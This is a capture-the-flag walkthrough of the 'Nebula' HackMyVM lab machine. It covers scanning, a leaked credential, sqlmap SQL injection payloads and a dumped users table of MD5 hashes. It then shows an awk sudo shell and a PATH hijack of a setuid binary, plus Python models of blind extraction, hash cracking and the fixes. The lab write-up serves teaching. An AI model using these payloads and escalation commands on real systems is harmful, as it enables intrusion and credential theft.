Nebula HackMyVM
- Attacker IP - 10.0.2.4
- Victim IP - 10.0.2.42
Finding the machine
First we look for the machine on the network with an arp-scan:
❯ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 08:00:27:b1:9d:67, IPv4: 10.0.2.4
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.2.1
10.0.2.2
10.0.2.3
10.0.2.42 (Unknown)
Now we know our victim's IP.
Nmap
We scan the machine. Only ports 22 and 80 are probed here (-p 22,80); in a real engagement run a full -p- sweep first so nothing else is missed:
❯ sudo nmap -Pn -sS -p 22,80 -A 10.0.2.42
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-05 21:01 EST
Nmap scan report for 10.0.2.42
Host is up (0.00073s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 63:9c:2e:57:91:af:1e:2e:25:ba:55:fd:ba:48:a8:60 (RSA)
| 256 d0:05:24:1d:a8:99:0e:d6:d1:e5:c5:5b:40:6a:b9:f9 (ECDSA)
|_ 256 d8:4a:b8:86:9d:66:6d:7f:a4:cb:d0:73:a1:f4:b5:19 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Nebula Lexus Labs
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:AA:A8:FD (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.73 ms 10.0.2.42
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.00 seconds
Enumeration
The site on port 80 has a login form; some SQL injection attempts against it got nowhere, so next we enumerate directories:
❯ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.2.42/FUZZ -fs 3479
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.0.2.42/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 3479
________________________________________________
[Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 10ms]
* FUZZ: login
[Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 1097ms]
* FUZZ: img
[Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 6ms]
* FUZZ: joinus
[Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 5ms]
* FUZZ: server-status
:: Progress: [220560/220560] :: Job [1/1] :: 5882 req/sec :: Duration: [0:00:44] :: Errors: 0 ::
We find http://10.0.2.42/joinus/, which serves a PDF. It explains that once you are accepted for the job, you will be sent a link of this form:
What to do when you are accepted
When you are accepted, we’ll advise you with a message to
your mail, with a user and password to access to the Meeting
URL in the website.
The link will be like:
https://nebulalabs.org/meetings?user=admin&password=d46df********************8f3b083
With those credentials we log in at http://10.0.2.42/login and get access. Note that the leaked "password" is a 32-character hex string: it reappears below as the admin row's password column in the users dump, so the application stores (and here accepted) an unsalted MD5 value.
Once logged in we reach http://10.0.2.42/login/search_central.php?id= and test the id parameter for SQL injection with sqlmap. The * marks the injection point; sqlmap warns that the value is empty, so id=1* would be the better choice, and if the page is only served to a logged-in session the session cookie has to be passed with --cookie, since sqlmap does not log in by itself:
❯ sqlmap -u "http://10.0.2.42/login/search_central.php?id=*" --batch --level=5 --risk=3 -dbs --tables
___
__H__
___ ___["]_____ ___ ___ {1.7.6#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:39:02 /2024-01-05/
...
[21:39:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:39:14] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] nebuladb
[21:39:14] [INFO] fetching tables for databases: 'information_schema, nebuladb'
Database: information_schema
[78 tables]
+---------------------------------------+
| ALL_PLUGINS |
| APPLICABLE_ROLES |
| CHARACTER_SETS |
| CHECK_CONSTRAINTS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES |
| ENABLED_ROLES |
| FILES |
| GEOMETRY_COLUMNS |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_MUTEXES |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_SEMAPHORE_WAITS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_SYS_VIRTUAL |
| INNODB_TABLESPACES_ENCRYPTION |
| INNODB_TABLESPACES_SCRUBBING |
| INNODB_TRX |
| KEYWORDS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| SPATIAL_REF_SYS |
| SQL_FUNCTIONS |
| STATISTICS |
| SYSTEM_VARIABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| COLUMNS |
| ENGINES |
| EVENTS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| TABLES |
| TRIGGERS |
| user_variables |
+---------------------------------------+
Database: nebuladb
[3 tables]
+---------------------------------------+
| central |
| centrals |
| users |
+---------------------------------------+
[21:39:15] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.2.42'
[21:39:15] [WARNING] your sqlmap version is outdated
[*] ending @ 21:39:14 /2024-01-05/
Knowing the database and the table we want, in this case users, we dump it:
❯ sqlmap -u "http://10.0.2.42/login/search_central.php?id=*" --batch --level=5 --risk=3 -D nebuladb -T users --dump
___
__H__
___ ___[(]_____ ___ ___ {1.7.6#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:46:53 /2024-01-05/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[21:46:53] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:46:53] [INFO] resuming back-end DBMS 'mysql'
[21:46:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://10.0.2.42/login/search_central.php?id=-2379' OR 6701=6701-- hLqr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://10.0.2.42/login/search_central.php?id=' AND (SELECT 1652 FROM (SELECT(SLEEP(5)))rkLR)-- feyp
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: http://10.0.2.42/login/search_central.php?id=' UNION ALL SELECT NULL,NULL,CONCAT(0x71766b6b71,0x4256537155644d48646f4a78535a6e546a54765361646c644d44515870617742634371544565457a,0x717a707671)-- -
---
[21:46:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:46:53] [INFO] fetching columns for table 'users' in database 'nebuladb'
[21:46:53] [INFO] fetching entries for table 'users' in database 'nebuladb'
[21:46:53] [INFO] recognized possible password hashes in column '`password`'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[21:46:53] [INFO] using hash method 'md5_generic_passwd'
[21:46:53] [INFO] resuming password '*********' for hash 'c8c605999f3d8352d7bb792cf3fdb25b' for user 'pmccentral'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[21:46:53] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[21:46:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:46:53] [INFO] starting 4 processes
Database: nebuladb
Table: users
[7 entries]
+----+----------+-------------+----------------------------------------------+
| id | is_admin | username | password |
+----+----------+-------------+----------------------------------------------+
| 1 | 1 | admin | d46df8e6a5627debf930f7b5c8f3b083 |
| 2 | 0 | pmccentral | c8c605999f3d8352d7bb792cf3fdb25b (********* ) |
| 3 | 0 | Frederick | 5f823f1ac7c9767c8d1efbf44158e0ea |
| 3 | 0 | Samuel | 4c6dda8a9d149332541e577b53e2a3ea |
| 5 | 0 | Mary | 41ae0e6fbe90c08a63217fc964b12903 |
| 6 | 0 | hecolivares | 5d8cdc88039d5fc021880f9af4f7c5c3 |
| 7 | 1 | pmccentral | c8c605999f3d8352d7bb792cf3fdb25b (********* ) |
+----+----------+-------------+----------------------------------------------+
[21:47:02] [INFO] table 'nebuladb.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.0.2.42/dump/nebuladb/users.csv'
[21:47:02] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.2.42'
[21:47:02] [WARNING] your sqlmap version is outdated
[*] ending @ 21:47:02 /2024-01-05/
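The injection sqlmap found above, as an added example that is not the box's own code: a Python/sqlite3 model of search_central.php with the query built by string concatenation next to the parameterised fix, the boolean-based blind oracle extracting a hash one hex digit at a time, and a dictionary attack on the unsalted MD5. The table and column names are the ones from the dump; the rows, the passwords and the exact shape of the PHP query are assumptions.

```python
"""Model of the search_central.php?id= injection. Added example, not the
box's own PHP: schema names come from the sqlmap dump, rows are made up."""
import hashlib
import sqlite3


def md5_hex(text):
    """Unsalted MD5, the scheme sqlmap recognised as md5_generic_passwd."""
    return hashlib.md5(text.encode()).hexdigest()


# Constructed rows; only the table/column names come from the dump.
SAMPLE_USERS = [(1, 1, "admin", "winter2023"), (2, 0, "pmccentral", "letmein")]
SAMPLE_CENTRALS = [(1, "North lab", "Building A"), (2, "South lab", "Building B")]


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE central (id INTEGER, name TEXT, location TEXT)")
    db.executemany("INSERT INTO central VALUES (?, ?, ?)", SAMPLE_CENTRALS)
    db.execute("CREATE TABLE users (id INTEGER, is_admin INTEGER, "
               "username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                   [(i, a, u, md5_hex(p)) for i, a, u, p in SAMPLE_USERS])
    return db


def search_central_vulnerable(db, id_value):
    """Assumed pattern behind search_central.php: the parameter is pasted
    into the SQL string, so a quote in it rewrites the query (3 columns,
    as sqlmap's UNION payload showed)."""
    query = f"SELECT id, name, location FROM central WHERE id='{id_value}'"
    return db.execute(query).fetchall()


def search_central_fixed(db, id_value):
    """Same lookup with a bound parameter: the value can never become SQL."""
    return db.execute("SELECT id, name, location FROM central WHERE id=?",
                      (id_value,)).fetchall()


def blind_extract_hash(db, username, length=32):
    """Boolean-based blind extraction of one user's password hash with the
    same true/false oracle as sqlmap's 'OR boolean-based blind' payload:
    a true condition returns the whole table, a false one returns nothing."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            payload = (f"-1' OR (SELECT substr(password, {pos}, 1) FROM users "
                       f"WHERE username='{username}')='{ch}'-- -")
            if search_central_vulnerable(db, payload):
                recovered += ch
                break
        else:
            raise ValueError(f"no hex digit matched at position {pos}")
    return recovered


def crack_md5(hash_hex, wordlist):
    """Dictionary attack on an unsalted MD5, what sqlmap's built-in cracker
    did for pmccentral. Returns the matching word or None."""
    for word in wordlist:
        if md5_hex(word) == hash_hex:
            return word
    return None


if __name__ == "__main__":
    db = build_db()
    print(search_central_vulnerable(db, "-2379' OR 6701=6701-- hLqr"))
    print(search_central_vulnerable(
        db, "' UNION ALL SELECT id, username, password FROM users-- -"))
    print(search_central_fixed(db, "-2379' OR 6701=6701-- hLqr"))
    h = blind_extract_hash(db, "pmccentral")
    print(h, crack_md5(h, ["password", "123456", "letmein"]))
```

The two payloads in the main block are the boolean and UNION payloads sqlmap reported, unchanged except for the column list; against the parameterised version they return nothing because the whole string is compared with the id column instead of being parsed.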
We now have pmccentral's credentials (the cracked password is masked above), so we log in over SSH:
❯ ssh pmccentral@10.0.2.42
Privilege escalation
pmccentral@laboratoryuser:~$ sudo -l
Matching Defaults entries for pmccentral on laboratoryuser:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pmccentral may run the following commands on laboratoryuser:
(laboratoryadmin) /usr/bin/awk
We look up awk on GTFOBins: awk's system() runs any command, so a sudo rule that allows awk as laboratoryadmin is effectively a shell as laboratoryadmin. Note the rule says (laboratoryadmin), not root, so this only gets us that user:
pmccentral@laboratoryuser:~$ sudo -u laboratoryadmin awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1002(laboratoryadmin) gid=1002(laboratoryadmin) groups=1002(laboratoryadmin)
$ pwd
/home/pmccentral
$ cd ..
$ ls
laboratoryadmin pmccentral
$ cd laboratoryadmin
$ bash
laboratoryadmin@laboratoryuser:~$ cat user.txt
flag{**************************}
Root
Now we look for a way to become root.
In laboratoryadmin's home there is a directory named autoScripts:
laboratoryadmin@laboratoryuser:~/autoScripts$ ls -la
total 32
drwxr-xr-x 2 laboratoryadmin laboratoryadmin 4096 Dec 18 20:16 .
drwx------ 8 laboratoryadmin laboratoryadmin 4096 Dec 18 16:15 ..
-rwxrwxr-x 1 laboratoryadmin laboratoryadmin 8 Dec 18 20:16 head
-rwsr-xr-x 1 root root 16792 Dec 17 15:40 PMCEmployees
laboratoryadmin@laboratoryuser:~/autoScripts$ cat head
bash -p
laboratoryadmin@laboratoryuser:~/autoScripts$ cat PMCEmployees
@@@@�ppUU ���-�=�=hp�-�=�=�888 XXXDDS�td888 P�tdh h h DDQ�tdR�td�-�=�=XX/lib64/ld-linux-x86-64.so.2GNU�GNU.�?fm�|����7sC�GN�e�mM /i x
[...]
@ @7@H>Rf�@� @� ��e��@�oHH�hh�B((� @�``�pp0� �h h D�� ������=�-��?�@0
@00+@0H. �64�8�
Running strings on it makes it readable. What the following steps show is what matters: the binary is setuid root (-rwsr-xr-x, owned by root) and runs head on /home/pmccentral/documents/employees.txt by its bare name rather than an absolute path, so whichever head comes first in the caller's PATH is executed with root's effective uid. The head file in autoScripts contains bash -p, which keeps that effective uid instead of dropping it.
I got a bit stuck here and had to look at a writeup to see what others had done.
laboratoryadmin@laboratoryuser:~/autoScripts$ head /home/pmccentral/documents/employees.txt
aren
Aarika
Abagael
Abagail
Abbe
Abbey
Abbi
Abbie
Abby
Abbye
laboratoryadmin@laboratoryuser:~/autoScripts$ cat head
bash -p
laboratoryadmin@laboratoryuser:~/autoScripts$ sudo head /home/pmccentral/documents/employees.txt
[sudo] password for laboratoryadmin:
laboratoryadmin@laboratoryuser:~/autoScripts$ export PATH=/home/laboratoryadmin/autoScripts/:$PATH
laboratoryadmin@laboratoryuser:~/autoScripts$ ./PMCEmployees
root@laboratoryuser:~/autoScripts# ^C
root@laboratoryuser:~/autoScripts# cd /root
root@laboratoryuser:/root# cat root.txt
flag{**********}
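The PATH hijack behind the last step, as an added example (not the box's binary): a Python model of how the shell that system(3) starts resolves a bare command name, a quick audit for such command strings in a binary's strings output, and the same lookup with a fixed PATH. The stand-in strings output, the sandbox directories and the stand-in head files are constructed; nothing here is setuid.

```python
"""Why the setuid PMCEmployees binary fell to a PATH hijack. Added example,
not the box's code: the hijack is reproduced in temp dirs with stand-in
'head' files, so nothing here runs with elevated privileges."""
import os
import re
import stat
import tempfile


def resolve_program(name, path_env):
    """Return the file /bin/sh would execute for `name`.
    A name containing '/' is used as given (PATH is never consulted);
    otherwise the first file of that name with an execute bit, in PATH
    order, wins. Returns None when nothing matches."""
    if "/" in name:
        return name
    for directory in path_env.split(":"):
        candidate = os.path.join(directory or ".", name)
        if os.path.isfile(candidate) and os.stat(candidate).st_mode & 0o111:
            return candidate
    return None


# Heuristic: a strings line that reads "<bare-name> <arguments containing a path>".
COMMAND_RE = re.compile(r"^([a-z][a-z0-9_.-]*)\s+(\S*/\S*)")


def audit_command_strings(lines):
    """Flag command strings whose program is a bare name, i.e. resolved
    through the caller's PATH. Meant for `strings <setuid binary>` output.
    Returns (program, full line) pairs."""
    findings = []
    for line in lines:
        match = COMMAND_RE.match(line.strip())
        if match:
            findings.append((match.group(1), line.strip()))
    return findings


# Constructed stand-in for `strings PMCEmployees`; the real output is not on the page.
SAMPLE_STRINGS = [
    "/lib64/ld-linux-x86-64.so.2",
    "system",
    "head /home/pmccentral/documents/employees.txt",
    "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04) 9.4.0",
]


def _write_exec(path, body):
    with open(path, "w") as f:
        f.write(body)
    os.chmod(path, os.stat(path).st_mode | stat.S_IXUSR)


def demo_hijack():
    """Reproduce the lookup from the writeup in a sandbox. Returns the
    directory name of the head that runs with the attacker's PATH, the one
    that runs with a fixed PATH, and what runs for an absolute program name."""
    with tempfile.TemporaryDirectory() as tmp:
        system_bin = os.path.join(tmp, "usr_bin")        # stands in for /usr/bin
        auto_scripts = os.path.join(tmp, "autoScripts")  # the writable dir on the box
        os.mkdir(system_bin)
        os.mkdir(auto_scripts)
        _write_exec(os.path.join(system_bin, "head"),
                    "#!/bin/sh\nexec /usr/bin/head \"$@\"\n")  # stand-in real head
        _write_exec(os.path.join(auto_scripts, "head"), "bash -p\n")  # the planted file
        inherited = f"{auto_scripts}:{system_bin}"  # export PATH=.../autoScripts:$PATH
        fixed = system_bin                          # what a hardened caller would set
        return (os.path.basename(os.path.dirname(resolve_program("head", inherited))),
                os.path.basename(os.path.dirname(resolve_program("head", fixed))),
                resolve_program("/usr/bin/head", inherited))


if __name__ == "__main__":
    print(demo_hijack())
    print(audit_command_strings(SAMPLE_STRINGS))
```

The trick works only because PMCEmployees is run directly and so inherits the caller's environment; sudo would have replaced PATH with the secure_path shown in the sudo -l output above. The fix belongs in the binary: name the program by absolute path or reset PATH to a fixed value before running anything, and better still do not call system() from a setuid program at all.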